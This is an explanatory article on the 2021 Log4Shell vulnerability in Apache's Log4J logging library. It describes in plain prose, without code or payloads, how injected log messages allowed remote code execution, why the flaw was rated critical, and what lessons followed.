In December 2021, videos emerged of hackers exploiting a feature on the popular videogame Minecraft. The game features an in-built chat function where players can send messages to each other. The servers hosting the game log these messages, presumably so that administrators can monitor what’s being said on their server.
And, it’s amongst the inconspicuous logging system where the Log4Shell vulnerability arose; one of the most dangerous security vulnerabilities identified over the past decade.
Hackers realised that they could exploit Log4J and have their own code executed on a target server; with devastating results.
Initially, some security researchers believed that this vulnerability would be limited to Minecraft servers. However, upon further examination, it was realised that a huge number of servers could be vulnerable to attack. Panic quickly set in, and system administrators from around the world scrambled to patch their systems.
What is Log4J?
Log4J is one of the most widely used logging libraries available. It’s a free, open-source software library that was developed by Apache and is widely adopted across the net; with even the internet’s big hitters such as Amazon Web Services (AWS) using the library.
Its job is to log the events that take place on the system. It keeps a record of what users do, what error messages appear, and so on.
For example, if you click on a broken link on a website, you may be redirected to a 404 error page. A 404 error is a web server’s way of telling you that the page you are looking for doesn’t exist. The role of a logging system such as Log4J is to record these ‘events’ in a log file, which can later be used by system administrators looking to squash bugs. Logging is crucial for good management as well as I.T security and forensics.
What was the Log4Shell vulnerability?
In December 2021, security researchers from the Alibaba Cloud Security Team released a publication of a zero-day vulnerability found in Log4J, which they appropriately dubbed ‘Log4Shell’. The vulnerability allowed for arbitrary code execution, allowing hackers to run malicious code on a target’s webserver.
The malicious code written by hackers could be used for a range of nefarious purposes; from gaining a remote shell to stealing sensitive information. Such vulnerabilities can be incredibly dangerous, and worryingly, they can be incredibly easy to exploit in the case of Log4J.
Hackers would prowl through the internet looking for servers that run Log4J. Once a target had been identified, they’d take some action which would prompt the server to record a message in its log file. The error message would be injected with malicious code, which Log4J would take and execute as a legitimate command.
The result? Hackers could potentially gain full control over a system and run whatever code they please.
Why is the Log4Shell vulnerability so serious?
Log4Shell was marked as a critical vulnerability and given a rating of 10.0 on the CVE index; the highest rating possible. American cybersecurity firm Tenable characterized it as “the single biggest, most critical vulnerability of the last decade.”
Arbitrary code execution is one of the most dangerous categories of vulnerabilities around. However, what made Log4Shell so dangerous was how widespread the library was being used; seeming almost omnipresent in applications that were built using Java.
So serious was Log4Shell that nation-states began issuing warnings to organisations that maintain critical infrastructure.
What lessons can be learned from the Log4Shell saga?
Log4Shell caused security engineers many sleepless nights, and some organisations are still feeling the knock-on effects from the vulnerability to this day.
A patch has now been released to remediate the core vulnerability within Log4J, and most server administrations have likely put adequate protections in place to safeguard their assets.
If Log4Shell has taught us anything, it’s that a vulnerability in a single library that has widespread appeal could cause significant damage to thousands of servers across the world if exploited.